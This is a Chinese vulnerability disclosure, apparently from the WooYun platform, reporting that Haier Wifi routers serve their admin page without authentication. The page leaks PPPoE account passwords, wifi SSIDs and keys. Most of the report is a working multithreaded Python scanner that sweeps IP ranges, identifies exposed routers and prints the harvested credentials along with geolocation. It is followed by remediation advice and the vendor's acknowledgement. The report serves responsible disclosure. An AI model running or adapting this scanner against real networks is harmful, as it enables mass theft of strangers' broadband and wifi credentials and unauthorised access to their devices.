2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开
未授权访问
Haier Wifi 路由器管理界面无需密码可直接远程访问,无需其他认证即可获取宽带账号密码以及wifi的ssid和key,使用脚本扫描网段即可轻松获取一部分设备信息。
扫描了少量网段,此类小众路由器使用量并不是太大,但是也是存在风险。给出多个实例截图
下面给出扫描的结果
下面给出扫描的脚本
#!/usr/bin/env python
# coding=utf-8
# code by 92ez.com
# last modify time 2015-08-15 13:21
#
# Proof-of-concept attached to the report (Python 2). It walks an IP range,
# requests http://<host>:<port>/ and, when the page title is "Haier Wifi",
# reads the PPPoE account, the wifi SSID/key and the factory WAN MAC straight
# out of the returned HTML. No login step appears anywhere in the script: the
# device serving these values to an unauthenticated request is the finding.
# Defender view: the title string and the field names matched below are the
# fingerprints of an exposed unit; the printed output contains live
# credentials and has to be handled as sensitive data.
import Queue
from threading import Thread
import time
import re
import sys
import subprocess
import json
import urllib2


# Pack a dotted-quad string into a single integer (first octet in the top byte).
def ip2num(ip):
    octets = [int(part) for part in ip.split('.')]
    return (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]


# Inverse of ip2num: render the low 32 bits of an integer as a dotted quad.
def num2ip(num):
    return '.'.join(str((num >> shift) & 0xff) for shift in (24, 16, 8, 0))


# List every address from start to end inclusive, leaving out those whose
# last octet is 0.
def ip_range(start, end):
    addresses = []
    for value in range(ip2num(start), ip2num(end) + 1):
        if value & 0xff:
            addresses.append(num2ip(value))
    return addresses


# Ask for a worker count, queue every address, then start the workers and
# wait for all of them to finish.
def bThread(iplist):
    worker_count = raw_input('Thread: ')
    print '[Note] Running...\n'
    pending = Queue.Queue()
    for address in iplist:
        pending.put(address)
    workers = []
    for _ in xrange(0, int(worker_count)):
        workers.append(tThread(pending))
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()


# Look up country / region / city / ISP for a host through the Taobao IP API.
# The lookup goes out over plain HTTP, so every matched address is disclosed
# to that third-party service.
# NOTE(review): on any failure this prints a note and calls itself again with
# no retry limit, and the inner call's result is not returned, so a failed
# first attempt yields None to the caller.
def getposition(host):
    try:
        lookup_url = "http://ip.taobao.com/service/getIpInfo.php?ip="+host
        raw_reply = urllib2.urlopen(lookup_url).read()
        data = json.loads(raw_reply)['data']
        return [data[field] for field in ('country', 'region', 'city', 'isp')]
    except Exception, e:
        print "[Note] Get "+ host+" position failed , will retry ...\n"
        getposition(host)


# Worker thread: takes hosts off the shared queue until it is empty and
# probes each one on the module-level PORT.
class tThread(Thread):
    def __init__(self, queue):
        Thread.__init__(self)
        self.queue = queue

    def run(self):
        global PORT
        while not self.queue.empty():
            target = self.queue.get()
            try:
                checktitle(target,PORT)
            except:
                # Any error for one host is dropped; move on to the next.
                pass


# Fetch the page at http://host:port (5 second timeout) and, if its title is
# "Haier Wifi", print what the page gives away. Everything printed comes from
# the body of that one unauthenticated response: two form inputs
# (wan_pppoe_username, wan_pppoe_passwd) and three JavaScript variables
# (ssid, psk, factoryWanMac). Any exception, including a missing field, is
# swallowed, so output for a host may stop part-way.
def checktitle(host,port):
    aimurl = "http://"+host+":"+port
    try:
        response = urllib2.urlopen(aimurl,timeout = 5)
        page = response.read()
        response.close()
        titles = re.findall(r'<title>(.+?)</title>',page)
        if titles[0].encode('utf8') != "Haier Wifi":
            return
        wan_user = re.findall(r'name=\"wan_pppoe_username\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',page)
        wan_pass = re.findall(r'name=\"wan_pppoe_passwd\" size=\"30\" maxlength=\"128\" value=\"(.+?)\">',page)
        wifi_name = re.findall(r'var ssid = \'(.+?)\'',page)
        wifi_key = re.findall(r'var psk = \'(.+?)\'',page)
        wan_mac = re.findall(r'var factoryWanMac=\"(.+?)\"',page)
        location = getposition(host)
        print "Found "+ titles[0].encode('utf8') + "\nurl: "+aimurl
        print "pppoeusername: "+wan_user[0].encode('utf8')+" pppoeupassword: "+wan_pass[0].encode('utf8')
        print "ssid: "+wifi_name[0]+" key: "+wifi_key[0].encode('utf8')
        print "factoryWanMac: "+wan_mac[0].encode('utf8')
        print " ".join([location[i].encode('utf8') for i in range(4)])+"\n"
    except Exception, e:
        pass


if __name__ == '__main__':
    print '\nScan Haier Wifi Router program.\n'
    first_ip = raw_input('Start IP: ')
    last_ip = raw_input('End IP: ')
    # PORT stays a string: checktitle concatenates it into the URL, and the
    # worker threads read it as a module-level global.
    PORT = raw_input('Port: ')
    iplist = ip_range(first_ip, last_ip)
    print '\n[Note] Will scan '+str(len(iplist))+" ips...\n"
    bThread(iplist)
至少得加个密码什么的吧,这样裸奔真的好吗。具体来说:管理界面应强制登录认证,默认不对 WAN 侧开放,页面源码里也不应明文回显宽带密码和 wifi 密钥。
危害等级:高
漏洞Rank:14
确认时间:2015-08-19 17:40
感谢乌云平台白帽子的测试与提醒,我方已安排人员进行处理
暂无